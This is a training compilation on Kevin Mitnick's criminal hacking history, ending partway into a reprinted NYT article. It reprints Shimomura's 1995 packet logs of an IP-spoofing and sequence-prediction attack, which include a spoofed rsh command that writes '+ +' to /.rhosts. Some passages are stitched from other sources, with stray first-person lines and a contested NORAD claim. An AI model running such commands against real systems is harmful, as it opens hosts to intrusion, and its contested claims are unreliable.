Note: This document provides an in-depth analysis of the hacking activites of Kevin Mitnick. It was created from many Web and other sources in 2002-2003 by Thomas Jerry Scott for use in his Computer Security Training classes.
  1. Early History for Kevin Mitnick -- Telephone Hacking in the 1970's
  2. Kevin's First Known Breakin -- PacBell's COSMOS -- 1981
  3. After Kevin's First Known Breakin -- 1981-1983
  4. Kevin's Second Arrest -- ArpaNet Hacking -- 1983
  5. Problems at the Santa Cruz Operation -- 1987
  6. Kevin's Arrest for Activities at the DEC Palo Alto Research Center -- 1989
  7. After the DEC Arrest -- early 1990's
  8. Activities at the California DMV in 1992
  9. Tsutomu Shimomura's Newsgroup Posting on the Mitnick Hack -- 1/25/95
  10. The FBI Press Release of the Mitnick Arrest -- 2/15/95

  11. John Markoff's NYT Article on Shimomora's Mitnick Capture -- 2/28/95
  12. Book Review of the Fugitive Game -- book on the Mitnick Hack
  13. Prison and Other Activities in 1997 and 1998
  14. Mitnick's Guilty Plea -- 1999
  15. Kevin Mitnick's Own Words about His Hacking -- Forbes.com Interview-- 5/99
  16. Court Documents on the Kevin Mitnick Case
  17. Kevin Mitnick's Congressional Testimony -- 3/2/2000
  18. FCC Moves to Take Mitnick's Radio License Away -- 12/6/2001
  19. Kevin Mitnick Testifies at the Los Vegas Sprint Trial -- 6/24/2002
  20. Kevin Finally Gets His Ham Radio License Back -- 12/26/2002

  21. Wiley and Sons publish Kevin and William Simon's book "The Art of Deception" 10/04/2002
  22. Kevin Mitnick Released from Prison 01/21/2003

  23. Return to the Main Menu



Return to the Beginning of this document

Early history for Kevin Mitnick -- Late 70's


Who is Kevin Mitnick?

The picture that emerged after his arrest in Raleigh, N.C. on February 15, 1995, was of a 31-year old computer programmer, who had been given a number of chances to get his life together but each time was seduced back to the dark side of the computer world. Kevin David Mitnick reached adolescence in suburban Los Angeles in the late 1970s, the same time the personal computer industry was exploding beyond its hobbyist roots.

His parents were divorced, and in a lower-middle-class environment that lacked adventure and in which he was largely a loner and an underachiever, he was seduced by the power he could gain over the telephone network. The underground culture of phone phreaks had already flourished for more than a decade, but it was now in the middle of a transition from the analog to the digital world.

Using a personal computer and modem it became possible to commandeer a phone company's digital central office switch by dialing in remotely, and Kevin became adept at doing so. Mastery of a local telephone company switch offered more than just free calls: It opened a window into the lives of other people to eavesdrop on the rich and powerful, or on his own enemies.

Mitnick soon fell in with an informal phone phreak gang that met irregularly in a pizza parlor in Hollywood. Much of what they did fell into the category of pranks, like taking over directory assistance and answering operator calls by saying, "Yes, that number is eight-seven-five-zero and a half. Do you know how to dial the half, ma'am?" or changing the class of service on someone's home phone to payphone status, so that whenever they picked up the receiver a recorded voice asked them to deposit twenty cents.

But the group seemed to have a mean streak as well. One of its members destroyed files of a San Francisco-based computer time-sharing company, a crime that went unsolved for more than a year -- until a break-in at a Los Angeles telephone company switching center led police to the gang.


Return to the Beginning of this document

First known Breakin by Mitnick and Friends


Kevin's first known break-in occurred over Memorial Day weekend in 1981, when Kevin and two friends decided to physically enter Pacific Bell's COSMOS phone center in downtown Los Angeles. COSMOS, or Computer System for Mainframe Operations, was a database used by many of the nation's phone companies for controlling the phone system's basic recordkeeping functions.

The group talked their way past a security guard and ultimately found the room where the COSMOS system was located. Once inside they took lists of computer passwords, including the combinations to the door locks at nine Pacific Bell central offices and a series of operating manuals for the COSMOS system..

To facilitate later social engineering they planted their pseudonyms and phone numbers in a rolodex sitting on one of the desks in the room. With a flourish one of the fake names they used was "John Draper," who was an actual computer programmer also known as the legendary phone phreak, Captain Crunch, the phone numbers were actually misrouted numbers that would ring at a coffee shop pay phone in Van Nuys.

The crime was far from perfect, however. A telephone company manager soon discovered the phony numbers and reported them to the local police, who started an investigation. The case was actually solved when a jilted girlfriend of one of the gang went to the police, and Kevin and his friends were soon arrested. The group was charged with destroying data over a computer network and with stealing operator's manuals from the telephone company. Kevin, 17 years old at the time, was relatively lucky, and was sentenced to spend only three months in the Los Angeles Juvenile Detention Center, followed by a year's probation.


Return to the Beginning of this document

Mitnick's Hacks in the Early 1980's -- War Games


A run-in with the police might have persuaded most bright kids to explore the many legal ways to have computer adventures, but Mitnick appeared to be obsessed by some twisted vision. Rather than developing his computer skills in creative and productive ways, he seemed interested only in learning enough short-cuts for computer break-ins and dirty tricks to continue to play out a fantasy that led to collision after collision with the police throughout the 1980s.

Kevin obviously loved the attention and the mystique his growing notoriety was bringing. Early on, after seeing the 1975 Robert Redford movie Three Days of the Condor, he had adopted Condor as his nom de guerre. In the film Redford plays the role of a hunted CIA researcher who uses his experience as an Army signal corpsman to manipulate the phone system and avoid capture. Mitnick seemed to view himself as the same kind of daring man on the run from the law.

Mitnick first received national attention in 1982 when he hacked into the North American Defense Command (NORAD). Mitnick's hack into NORAD is thought to have inspired the 1983 film "War Games."


Return to the Beginning of this document

Kevin's Second Arrest -- ArpaNet Hacking -- 1983

His next arrest was in 1983 by campus police at the University of Southern California, where he had gotten into minor trouble a few years earlier, when he was caught using a university computer to gain illegal access to the ARPAnet.

This time he was discovered sitting at a computer in a campus terminal room, breaking into a Pentagon computer over the ARPAnet, and was sentenced to six months at the California Youth Authority's Karl Holton Training School, a juvenile prison in Stockton, California.

After he was released, he obtained the license plate "X HACKER" for his Nissan, but he was still very much in the computer break-in business. Several years later he went underground for more than a year after being accused of tampering with a TRW credit reference computer; an arrest warrant was issued, but it later vanished from police records without explanation.


Return to the Beginning of this document

Kevin's Third Arrest -- The Santa Cruz Operation -- 1987


By 1987, Mitnick seemed to be making an effort to pull his life together, and he began living with a woman who was taking a computer class with him at a local vocational school.

After a while, however, his obsession drew him back, and this time his use of illegal telephone credit card numbers led police investigators to the apartment he was sharing with his girlfriend in Thousand Oaks, California. He was convicted of stealing software from the Santa Cruz Operation, a California software company, and in December 1987, he was sentenced to 36 months probation. That brush with the police, and the resultant wrist slap, seemed only increase his sense of omnipotence.


Return to the Beginning of this document

Kevin's Fourth Arrest -- DEC's Palo Alto Research Center


In 1987 and 1988, Kevin and a friend, Lenny DiCicco, fought a pitched electronic battle against scientists at Digital Equipment's Palo Alto research laboratory. Mitnick had become obsessed with obtaining a copy of Digital's VMS minicomputer operating system, and was trying to do so by gaining entry to the company's corporate computer network, known as Easynet.

The computers at Digital's Palo Alto laboratory looked easiest, so every night with remarkable persistence Mitnick and DiCicco would launch their modem attacks from a small Calabasas, California company where DiCicco had a computer support job. Although Reid discovered the attacks almost immediately, he didn't know where they were coming from, nor did the local police or FBI, because Mitnick was manipulating the telephone network's switches to disguise the source of the modem calls.

The FBI can easily serve warrants and get trap-and-trace information from telephone companies, but few of its agents know how to interpret the data they provide. If the bad guy is actually holed up at the address that corresponds to the telephone number, they're set. But if the criminal has electronically broken into to the telephone company's local switch and scrambled the routing tables, they're clueless.

Kevin had easily frustrated their best attempts at tracking him through the telephone network using wiretaps and traces. He would routinely use two computer terminals each night -- one for his forays into Digital's computers, the other as a lookout that scanned the telephone company computers to see if his trackers were getting close.
At one point, a team of law enforcement and telephone security agents thought they had tracked him down, only to find that Mitnick had diverted the telephone lines so as to lead his pursuers not to his hideout in Calabasas, but to an apartment in Malibu. Mitnick, it seemed, was a tough accomplice, for even as they had been working together he had been harassing DiCicco by making fake calls to DiCicco's employer, claiming to be a Government agent and saying that DiCicco was in trouble with the Internal Revenue Service.

The frustrated DiCicco confessed to his boss, who notified DEC and the FBI, and Mitnick soon wound up in federal court in Los Angeles. Although DEC claimed that he had stolen software worth several million dollars, and had cost DEC almost $200,000 in time spent trying to keep him out of their computers, Kevin pleaded guilty to one count of computer fraud and one count of possessing illegal long-distance access codes.

It was the fifth time that Mitnick had been apprehended for a computer crime, and the case attracted nationwide attention because, in an unusual plea bargain, he agreed to one year in prison and six months in a counseling program for his computer "addiction."

It was a strange defense tactic, but a federal judge, after initially balking, bought the idea that there was some sort of psychological parallel between the obsession Mitnick had for breaking in to computer systems and an addict's craving for drugs.


Return to the Beginning of this document

Early 90's -- Social Engineering


After he finished his jail time and his halfway-house counseling sentence for the 1989 Digital Equipment conviction Mitnick moved to Las Vegas and took a low-level computer programming position for a mailing list company. His mother had moved there, as had a woman who called herself Susan Thunder who had been part of Mitnick's phone phreak gang in the early 1980s, and with whom he now became reacquainted.

It was during this period that he tried to "social engineer" me over the phone. In early 1992 Mitnick moved back to the San Fernando Valley area after his half-brother died of an apparent heroin overdose. He briefly worked for his father in construction, but then took a job he found through a friend of his father's at the Tel Tec Detective Agency .

Soon after he began, someone was discovered illegally using a commercial database system on the agency's behalf, and Kevin was once again the subject of an FBI investigation. In September the Bureau searched his apartment, as well as the home and workplace of another member of the original phone phreak gang.

Two months later a federal judge issued a warrant for Mitnick's arrest for having violated the terms of his 1989 probation. There were two charges: illegally accessing a phone company computer, and associating with one of the people with whom he'd originally been arrested in 1981. His friends claimed Mitnick had been set up by the detective firm; whatever the truth, when the FBI came to arrest him, Kevin Mitnick had vanished.


Return to the Beginning of this document

Activities at the California DMV in 1992


In late 1992 someone called the California Department of Motor Vehicles office in Sacramento, and using a valid law enforcement requester code, attempted to have driver's license photographs of a police informer faxed to a number in Studio City, near Los Angeles.

Smelling fraud, D.M.V. security officers checked the number and discovered that it was assigned to a Kinko's copy shop, which they staked out before faxing the photographs. But somehow the spotters didn't see their quarry until he was going out the door of the copy shop. They started after him, but he outran them across the parking lot and disappeared around the corner, dropping the documents as he fled.

The agents later determined that they were covered with Kevin Mitnick's fingerprints. His escape, subsequently reported in the Southern California newspapers, made the authorities look like bumblers who were no match for a brilliant and elusive cyberthief.


Return to the Beginning of this document

Tsutomu Shimomura's Newsgroup Posting on the Mitnick Hack


Tsutomu Shimomura's newsgroup posting with technical details of the attack described by Markoff in NYT.

Newsgroups: comp.security.misc,comp.protocols.tcp-ip,alt.security
From: Tsutomu Shimomura
Subject: Technical details of the attack described by Markoff in NYT

Precedence: bulk
Keywords: IP spoofing, security, session hijacking
Lines: 288
Sender: firewalls-owner@GreatCircle.COM
Cc: firewalls@GreatCircle.COM
Organization: San Diego Supercomputer Center
Date: Wed, 25 Jan 1995 12:36:45 GMT

Greetings from Lake Tahoe.

There seems to be a lot of confusion about the IP address spoofing and connection hijacking attacks described by John Markoff's 1/23/95 NYT article, and CERT advisory CA-95:01.

Here are some technical details from my presentation on 1/11/95 at CMAD 3 in Sonoma, California. Hopefully this will help clear up any misunderstandings as to the nature of these attacks.

Two different attack mechanisms were used. IP source address spoofing and TCP sequence number prediction were used to gain initial access to a diskless workstation being used mostly as an X terminal. After root access had been obtained, an existing connection to another system was hijacked by means of a loadable kernel STREAMS module.

Included in this note are excerpts from actual tcpdump packet logs generated by this attack. In the interest of clarity (and brevity!), some of the data has been omitted.

I highly recommend Steve Bellovin's paper and posts on IP spoofing, as he describes in more detail the semantics of the TCP handshake, as well as making some suggestions on how to defeat this attack.

My configuration is as follows:
server = a SPARCstation running Solaris 1 serving my "X terminal"
x-terminal = a diskless SPARCstation running Solaris 1
target = the apparent primary target of the attack

-----

The IP spoofing attack started at about 14:09:32 PST on 12/25/94. The first probes were from toad.com (this info derived from packet logs):

14:09:32 toad.com# finger -l @target
14:10:21 toad.com# finger -l @server
14:10:50 toad.com# finger -l root@server
14:11:07 toad.com# finger -l @x-terminal
14:11:38 toad.com# showmount -e x-terminal
14:11:49 toad.com# rpcinfo -p x-terminal
14:12:05 toad.com# finger -l root@x-terminal

The apparent purpose of these probes was to determine if there might be some kind of trust relationship amongst these systems which could be exploited with an IP spoofing attack. The source port numbers for the showmount and rpcinfo indicate that the attacker is root on toad.com.

-----

About six minutes later, we see a flurry of TCP SYNs (initial connection requests) from 130.92.6.97 to port 513 (login) on server. The purpose of these SYNs is to fill the connection queue for port 513 on server with "half-open" connections so it will not respond to any new connection requests. In particular, it will not generate TCP RSTs in response to unexpected SYN-ACKs.

As port 513 is also a "privileged" port (< IPPORT_RESERVED), server.login can now be safely used as the putative source for an address spoofing attack on the UNIX "r-services" (rsh, rlogin). 130.92.6.97 appears to be a random (forged) unused address (one that will not generate any response to packets sent to it):

14:18:22.516699 130.92.6.97.600 > server.login: S 1382726960:1382726960(0) win 4096
14:18:22.566069 130.92.6.97.601 > server.login: S 1382726961:1382726961(0) win 4096
14:18:22.744477 130.92.6.97.602 > server.login: S 1382726962:1382726962(0) win 4096
14:18:22.830111 130.92.6.97.603 > server.login: S 1382726963:1382726963(0) win 4096
14:18:22.886128 130.92.6.97.604 > server.login: S 1382726964:1382726964(0) win 4096
14:18:22.943514 130.92.6.97.605 > server.login: S 1382726965:1382726965(0) win 4096
14:18:23.002715 130.92.6.97.606 > server.login: S 1382726966:1382726966(0) win 4096
14:18:23.103275 130.92.6.97.607 > server.login: S 1382726967:1382726967(0) win 4096
14:18:23.162781 130.92.6.97.608 > server.login: S 1382726968:1382726968(0) win 4096
14:18:23.225384 130.92.6.97.609 > server.login: S 1382726969:1382726969(0) win 4096
14:18:23.282625 130.92.6.97.610 > server.login: S 1382726970:1382726970(0) win 4096
14:18:23.342657 130.92.6.97.611 > server.login: S 1382726971:1382726971(0) win 4096
14:18:23.403083 130.92.6.97.612 > server.login: S 1382726972:1382726972(0) win 4096
14:18:23.903700 130.92.6.97.613 > server.login: S 1382726973:1382726973(0) win 4096
14:18:24.003252 130.92.6.97.614 > server.login: S 1382726974:1382726974(0) win 4096
14:18:24.084827 130.92.6.97.615 > server.login: S 1382726975:1382726975(0) win 4096
14:18:24.142774 130.92.6.97.616 > server.login: S 1382726976:1382726976(0) win 4096
14:18:24.203195 130.92.6.97.617 > server.login: S 1382726977:1382726977(0) win 4096
14:18:24.294773 130.92.6.97.618 > server.login: S 1382726978:1382726978(0) win 4096
14:18:24.382841 130.92.6.97.619 > server.login: S 1382726979:1382726979(0) win 4096
14:18:24.443309 130.92.6.97.620 > server.login: S 1382726980:1382726980(0) win 4096
14:18:24.643249 130.92.6.97.621 > server.login: S 1382726981:1382726981(0) win 4096
14:18:24.906546 130.92.6.97.622 > server.login: S 1382726982:1382726982(0) win 4096
14:18:24.963768 130.92.6.97.623 > server.login: S 1382726983:1382726983(0) win 4096
14:18:25.022853 130.92.6.97.624 > server.login: S 1382726984:1382726984(0) win 4096
14:18:25.153536 130.92.6.97.625 > server.login: S 1382726985:1382726985(0) win 4096
14:18:25.400869 130.92.6.97.626 > server.login: S 1382726986:1382726986(0) win 4096
14:18:25.483127 130.92.6.97.627 > server.login: S 1382726987:1382726987(0) win 4096
14:18:25.599582 130.92.6.97.628 > server.login: S 1382726988:1382726988(0) win 4096
14:18:25.653131 130.92.6.97.629 > server.login: S 1382726989:1382726989(0) win 4096

server generated SYN-ACKs for the first eight SYN requests before the connection queue filled up. server will periodically retransmit these SYN-ACKs as there is nothing to ACK them.

-----

We now see 20 connection attempts from apollo.it.luc.edu to x-terminal.shell. The purpose of these attempts is to determine the behavior of x-terminal's TCP sequence number generator. Note that the initial sequence numbers increment by one for each connection, indicating that the SYN packets are *not* being generated by the system's TCP implementation. This results in RSTs conveniently being generated in response to each unexpected SYN-ACK, so the connection queue on x-terminal does not fill up:

14:18:25.906002 apollo.it.luc.edu.1000 > x-terminal.shell: S 1382726990:1382726990(0) win 4096
14:18:26.094731 x-terminal.shell > apollo.it.luc.edu.1000: S 2021824000:2021824000(0) ack 1382726991 win 4096
14:18:26.172394 apollo.it.luc.edu.1000 > x-terminal.shell: R 1382726991:1382726991(0) win 0
14:18:26.507560 apollo.it.luc.edu.999 > x-terminal.shell: S 1382726991:1382726991(0) win 4096
14:18:26.694691 x-terminal.shell > apollo.it.luc.edu.999: S 2021952000:2021952000(0) ack 1382726992 win 4096
14:18:26.775037 apollo.it.luc.edu.999 > x-terminal.shell: R 1382726992:1382726992(0) win 0
14:18:26.775395 apollo.it.luc.edu.999 > x-terminal.shell: R 1382726992:1382726992(0) win 0
14:18:27.014050 apollo.it.luc.edu.998 > x-terminal.shell: S 1382726992:1382726992(0) win 4096
14:18:27.174846 x-terminal.shell > apollo.it.luc.edu.998: S 2022080000:2022080000(0) ack 1382726993 win 4096
14:18:27.251840 apollo.it.luc.edu.998 > x-terminal.shell: R 1382726993:1382726993(0) win 0
14:18:27.544069 apollo.it.luc.edu.997 > x-terminal.shell: S 1382726993:1382726993(0) win 4096
14:18:27.714932 x-terminal.shell > apollo.it.luc.edu.997: S 2022208000:2022208000(0) ack 1382726994 win 4096
14:18:27.794456 apollo.it.luc.edu.997 > x-terminal.shell: R 1382726994:1382726994(0) win 0
14:18:28.054114 apollo.it.luc.edu.996 > x-terminal.shell: S 1382726994:1382726994(0) win 4096
14:18:28.224935 x-terminal.shell > apollo.it.luc.edu.996: S 2022336000:2022336000(0) ack 1382726995 win 4096
14:18:28.305578 apollo.it.luc.edu.996 > x-terminal.shell: R 1382726995:1382726995(0) win 0
14:18:28.564333 apollo.it.luc.edu.995 > x-terminal.shell: S 1382726995:1382726995(0) win 4096
14:18:28.734953 x-terminal.shell > apollo.it.luc.edu.995: S 2022464000:2022464000(0) ack 1382726996 win 4096
14:18:28.811591 apollo.it.luc.edu.995 > x-terminal.shell: R 1382726996:1382726996(0) win 0
14:18:29.074990 apollo.it.luc.edu.994 > x-terminal.shell: S 1382726996:1382726996(0) win 4096
14:18:29.274572 x-terminal.shell > apollo.it.luc.edu.994: S 2022592000:2022592000(0) ack 1382726997 win 4096
14:18:29.354139 apollo.it.luc.edu.994 > x-terminal.shell: R 1382726997:1382726997(0) win 0
14:18:29.354616 apollo.it.luc.edu.994 > x-terminal.shell: R 1382726997:1382726997(0) win 0
14:18:29.584705 apollo.it.luc.edu.993 > x-terminal.shell: S 1382726997:1382726997(0) win 4096
14:18:29.755054 x-terminal.shell > apollo.it.luc.edu.993: S 2022720000:2022720000(0) ack 1382726998 win 4096
14:18:29.840372 apollo.it.luc.edu.993 > x-terminal.shell: R 1382726998:1382726998(0) win 0
14:18:30.094299 apollo.it.luc.edu.992 > x-terminal.shell: S 1382726998:1382726998(0) win 4096
14:18:30.265684 x-terminal.shell > apollo.it.luc.edu.992: S 2022848000:2022848000(0) ack 1382726999 win 4096
14:18:30.342506 apollo.it.luc.edu.992 > x-terminal.shell: R 1382726999:1382726999(0) win 0
14:18:30.604547 apollo.it.luc.edu.991 > x-terminal.shell: S 1382726999:1382726999(0) win 4096
14:18:30.775232 x-terminal.shell > apollo.it.luc.edu.991: S 2022976000:2022976000(0) ack 1382727000 win 4096
14:18:30.852084 apollo.it.luc.edu.991 > x-terminal.shell: R 1382727000:1382727000(0) win 0
14:18:31.115036 apollo.it.luc.edu.990 > x-terminal.shell: S 1382727000:1382727000(0) win 4096
14:18:31.284694 x-terminal.shell > apollo.it.luc.edu.990: S 2023104000:2023104000(0) ack 1382727001 win 4096
14:18:31.361684 apollo.it.luc.edu.990 > x-terminal.shell: R 1382727001:1382727001(0) win 0
14:18:31.627817 apollo.it.luc.edu.989 > x-terminal.shell: S 1382727001:1382727001(0) win 4096
14:18:31.795260 x-terminal.shell > apollo.it.luc.edu.989: S 2023232000:2023232000(0) ack 1382727002 win 4096
14:18:31.873056 apollo.it.luc.edu.989 > x-terminal.shell: R 1382727002:1382727002(0) win 0
14:18:32.164597 apollo.it.luc.edu.988 > x-terminal.shell: S 1382727002:1382727002(0) win 4096
14:18:32.335373 x-terminal.shell > apollo.it.luc.edu.988: S 2023360000:2023360000(0) ack 1382727003 win 4096
14:18:32.413041 apollo.it.luc.edu.988 > x-terminal.shell: R 1382727003:1382727003(0) win 0
14:18:32.674779 apollo.it.luc.edu.987 > x-terminal.shell: S 1382727003:1382727003(0) win 4096
14:18:32.845373 x-terminal.shell > apollo.it.luc.edu.987: S 2023488000:2023488000(0) ack 1382727004 win 4096
14:18:32.922158 apollo.it.luc.edu.987 > x-terminal.shell: R 1382727004:1382727004(0) win 0
14:18:33.184839 apollo.it.luc.edu.986 > x-terminal.shell: S 1382727004:1382727004(0) win 4096
14:18:33.355505 x-terminal.shell > apollo.it.luc.edu.986: S 2023616000:2023616000(0) ack 1382727005 win 4096
14:18:33.435221 apollo.it.luc.edu.986 > x-terminal.shell: R 1382727005:1382727005(0) win 0
14:18:33.695170 apollo.it.luc.edu.985 > x-terminal.shell: S 1382727005:1382727005(0) win 4096
14:18:33.985966 x-terminal.shell > apollo.it.luc.edu.985: S 2023744000:2023744000(0) ack 1382727006 win 4096
14:18:34.062407 apollo.it.luc.edu.985 > x-terminal.shell: R 1382727006:1382727006(0) win 0
14:18:34.204953 apollo.it.luc.edu.984 > x-terminal.shell: S 1382727006:1382727006(0) win 4096
14:18:34.375641 x-terminal.shell > apollo.it.luc.edu.984: S 2023872000:2023872000(0) ack 1382727007 win 4096
14:18:34.452830 apollo.it.luc.edu.984 > x-terminal.shell: R 1382727007:1382727007(0) win 0
14:18:34.714996 apollo.it.luc.edu.983 > x-terminal.shell: S 1382727007:1382727007(0) win 4096
14:18:34.885071 x-terminal.shell > apollo.it.luc.edu.983: S 2024000000:2024000000(0) ack 1382727008 win 4096
14:18:34.962030 apollo.it.luc.edu.983 > x-terminal.shell: R 1382727008:1382727008(0) win 0
14:18:35.225869 apollo.it.luc.edu.982 > x-terminal.shell: S 1382727008:1382727008(0) win 4096
14:18:35.395723 x-terminal.shell > apollo.it.luc.edu.982: S 2024128000:2024128000(0) ack 1382727009 win 4096
14:18:35.472150 apollo.it.luc.edu.982 > x-terminal.shell: R 1382727009:1382727009(0) win 0
14:18:35.735077 apollo.it.luc.edu.981 > x-terminal.shell: S 1382727009:1382727009(0) win 4096
14:18:35.905684 x-terminal.shell > apollo.it.luc.edu.981: S 2024256000:2024256000(0) ack 1382727010 win 4096
14:18:35.983078 apollo.it.luc.edu.981 > x-terminal.shell: R 1382727010:1382727010(0) win 0

Note that each SYN-ACK packet sent by x-terminal has an initial sequence number which is 128,000 greater than the previous one.

-----

We now see a forged SYN (connection request), allegedly from server.login to x-terminal.shell. The assumption is that x-terminal probably trusts server, so x-terminal will do whatever server (or anything masquerading as server) asks.

x-terminal then replies to server with a SYN-ACK, which must be ACK'd in order for the connection to be opened. As server is ignoring packets sent to server.login, the ACK must be forged as well.

Normally, the sequence number from the SYN-ACK is required in order to generate a valid ACK. However, the attacker is able to predict the sequence number contained in the SYN-ACK based on the known behavior of x-terminal's TCP sequence number generator, and is thus able to ACK the SYN-ACK without seeing it:

14:18:36.245045 server.login > x-terminal.shell: S 1382727010:1382727010(0) win 4096
14:18:36.755522 server.login > x-terminal.shell: . ack 2024384001 win 4096

-----

The spoofing machine now has a one-way connection to x-terminal.shell which appears to be from server.login. It can maintain the connection and send data provided that it can properly ACK any data sent by x-terminal. It sends the following:

14:18:37.265404 server.login > x-terminal.shell: P 0:2(2) ack 1 win 4096
14:18:37.775872 server.login > x-terminal.shell: P 2:7(5) ack 1 win 4096
14:18:38.287404 server.login > x-terminal.shell: P 7:32(25) ack 1 win 4096

which corresponds to:
14:18:37 server# rsh x-terminal "echo + + >>/.rhosts"

Total elapsed time since the first spoofed packet: < 16 seconds

-----

The spoofed connection is now shut down:

14:18:41.347003 server.login > x-terminal.shell: . ack 2 win 4096
14:18:42.255978 server.login > x-terminal.shell: . ack 3 win 4096
14:18:43.165874 server.login > x-terminal.shell: F 32:32(0) ack 3 win 4096
14:18:52.179922 server.login > x-terminal.shell: R 1382727043:1382727043(0) win 4096
14:18:52.236452 server.login > x-terminal.shell: R 1382727044:1382727044(0) win 4096

-----

We now see RSTs to reset the "half-open" connections and empty the connection queue for server.login:

14:18:52.298431 130.92.6.97.600 > server.login: R 1382726960:1382726960(0) win 4096
14:18:52.363877 130.92.6.97.601 > server.login: R 1382726961:1382726961(0) win 4096
14:18:52.416916 130.92.6.97.602 > server.login: R 1382726962:1382726962(0) win 4096
14:18:52.476873 130.92.6.97.603 > server.login: R 1382726963:1382726963(0) win 4096
14:18:52.536573 130.92.6.97.604 > server.login: R 1382726964:1382726964(0) win 4096
14:18:52.600899 130.92.6.97.605 > server.login: R 1382726965:1382726965(0) win 4096
14:18:52.660231 130.92.6.97.606 > server.login: R 1382726966:1382726966(0) win 4096
14:18:52.717495 130.92.6.97.607 > server.login: R 1382726967:1382726967(0) win 4096
14:18:52.776502 130.92.6.97.608 > server.login: R 1382726968:1382726968(0) win 4096
14:18:52.836536 130.92.6.97.609 > server.login: R 1382726969:1382726969(0) win 4096
14:18:52.937317 130.92.6.97.610 > server.login: R 1382726970:1382726970(0) win 4096
14:18:52.996777 130.92.6.97.611 > server.login: R 1382726971:1382726971(0) win 4096
14:18:53.056758 130.92.6.97.612 > server.login: R 1382726972:1382726972(0) win 4096
14:18:53.116850 130.92.6.97.613 > server.login: R 1382726973:1382726973(0) win 4096
14:18:53.177515 130.92.6.97.614 > server.login: R 1382726974:1382726974(0) win 4096
14:18:53.238496 130.92.6.97.615 > server.login: R 1382726975:1382726975(0) win 4096
14:18:53.297163 130.92.6.97.616 > server.login: R 1382726976:1382726976(0) win 4096
14:18:53.365988 130.92.6.97.617 > server.login: R 1382726977:1382726977(0) win 4096
14:18:53.437287 130.92.6.97.618 > server.login: R 1382726978:1382726978(0) win 4096
14:18:53.496789 130.92.6.97.619 > server.login: R 1382726979:1382726979(0) win 4096
14:18:53.556753 130.92.6.97.620 > server.login: R 1382726980:1382726980(0) win 4096
14:18:53.616954 130.92.6.97.621 > server.login: R 1382726981:1382726981(0) win 4096
14:18:53.676828 130.92.6.97.622 > server.login: R 1382726982:1382726982(0) win 4096
14:18:53.736734 130.92.6.97.623 > server.login: R 1382726983:1382726983(0) win 4096
14:18:53.796732 130.92.6.97.624 > server.login: R 1382726984:1382726984(0) win 4096
14:18:53.867543 130.92.6.97.625 > server.login: R 1382726985:1382726985(0) win 4096
14:18:53.917466 130.92.6.97.626 > server.login: R 1382726986:1382726986(0) win 4096
14:18:53.976769 130.92.6.97.627 > server.login: R 1382726987:1382726987(0) win 4096
14:18:54.039039 130.92.6.97.628 > server.login: R 1382726988:1382726988(0) win 4096
14:18:54.097093 130.92.6.97.629 > server.login: R 1382726989:1382726989(0) win 4096

server.login can again accept connections.

-----

After root access had been gained via IP address spoofing, a kernel module named "tap-2.01" was compiled and installed on x-terminal:

x-terminal% modstat
Id Type Loadaddr Size B-major C-major Sysnum Mod Name
1 Pdrv ff050000 1000 59. tap/tap-2.01 alpha

x-terminal% ls -l /dev/tap
crwxrwxrwx 1 root 37, 59 Dec 25 14:40 /dev/tap

This appears to be a kernel STREAMS module which can be pushed onto an existing STREAMS stack and used to take control of a tty device. It was used to take control of an already authenticated login session to target at about 14:51 PST.

-----

Of course, no attack would be complete without the personal touch. Check out:

ftp://ftp.sdsc.edu/pub/security/sounds/tweedle-dee.au
ftp://ftp.sdsc.edu/pub/security/sounds/tweedle-dum.au

These are in Sun audio file format, 8-bit u-law, 8 khz sample rate.

---
Tsutomu Shimomura tsutomu@ucsd.edu +1 619 534 5050
University of California at San Diego/San Diego Supercomputer Center, USA


Return to the Beginning of this document

The FBI Arrest Warrant for the Shimomora Hack -- 1995


FBI PRESS RELEASE (Feb 15, 1995)


At 1:30 a.m., today, February 15, 1995, agents of the FBI arrested KEVIN MITNICK, a well-known computer hacker and federal fugitive. The arrest occurred after an intensive two-weak electronic manhunt led law enforcement agents to MITNICK's apartment in Raleigh, North Carolina.

MITNICK, 31, was convicted by Federal authorities in 1988 in Los Angeles for stealing computer programs and breaking into corporate networks.

He received a one-year sentence in that case, and a Federal warrant was issued following MITNICK's violation of probation.

In this latest incident, MITNICK is alleged to have electronically attacked numerous corporate and communications carriers located in California, Colorado, and North Carolina where he caused significant damage and stole proprietary information. One of the attacked sites was the San Diego Supercomputer Center (SDSC), and Tsutomu Shimomura, a system administrator at SDSC, provided significant assistance to law enforcement personnel during the investigation. MITNICK is also under investigation by state law enforcement authorities in Seattle for separate activities there.

As is typical in such interstate computer cases, may FBI offices and United States Attorneys' Offices have carefully coordinated their efforts. These offices include the FBI's Nation al Computer Crime Squad at the Washington Metropolitan Field Office, as well as FBI and United States Attorneys' Offices in the Eastern District of North Carolina (Raleigh), the Central District of North Carolina (Greensboro), the Southern District of California (San Diego), the Central District of California (Los Angeles), the Northern District of California (San Francisco), and the District of Colorado. Legal and technical assistance is also being provided by the Criminal Division's Computer Crime Unit in Washington, D. C.

On February 15, 1995, a complaint was filed in U. S. District Court, Raleigh, N. C., charging KEVIN MITNICK with violation of 18 U. S. Code, Section 1029 (Fraud and Related Activity in Connection With Access Devices) in violation Title 18, Section 1038 (Fraud and Related Activities in Connection with Computers).


Return to the Beginning of this Document

How Shimomura snared Kevin Mitnick

By John Markoff 28 Feb 95 Copyright © 1995, The New York Times


The capture of Kevin Mitnick, America's prince of hackers, is a story worthy of a Dick Francis thriller.

It takes a computer hacker to catch one. If, as United States federal authorities contend, 31-year-old computer outlaw Kevin Mitnick is the person behind a spate of break-ins to dozens of corporate, university and personal computers on the Internet, his biggest mistake was raising the interest and ire of Tsutomu Shimomura.

Shimomura, 30, is a physicist with a reputation as a brilliant cyber-sleuth in the tightly knit community of programmers and engineers who defend the country's computer networks.

It was Shimomura who raised the alarm in the Internet world after someone used sophisticated hacking techniques on Christmas day to remotely break into the computers he keeps in his beach cottage near San Diego and steal thousands of his files.

Almost from the moment Shimomura discovered the intrusion, he made it his business to use his own considerable hacking skills to aid the FBI's inquiry into the crime spree.

He set up monitoring posts, and used software of his own design to track the intruder prowling the Internet. Shimomura's monitoring efforts enabled investigators to watch as the intruder commandeered telephone company switching centres, stole computer files from Motorola, Apple Computer and other companies and copied 20,000 credit-card account numbers from a commercial computer network.

It was Shimomura who concluded that the intruder was probably Mitnick, whose whereabouts had been unknown since November 1992, and that he was operating from a cellular telephone network in Raleigh, North Carolina.

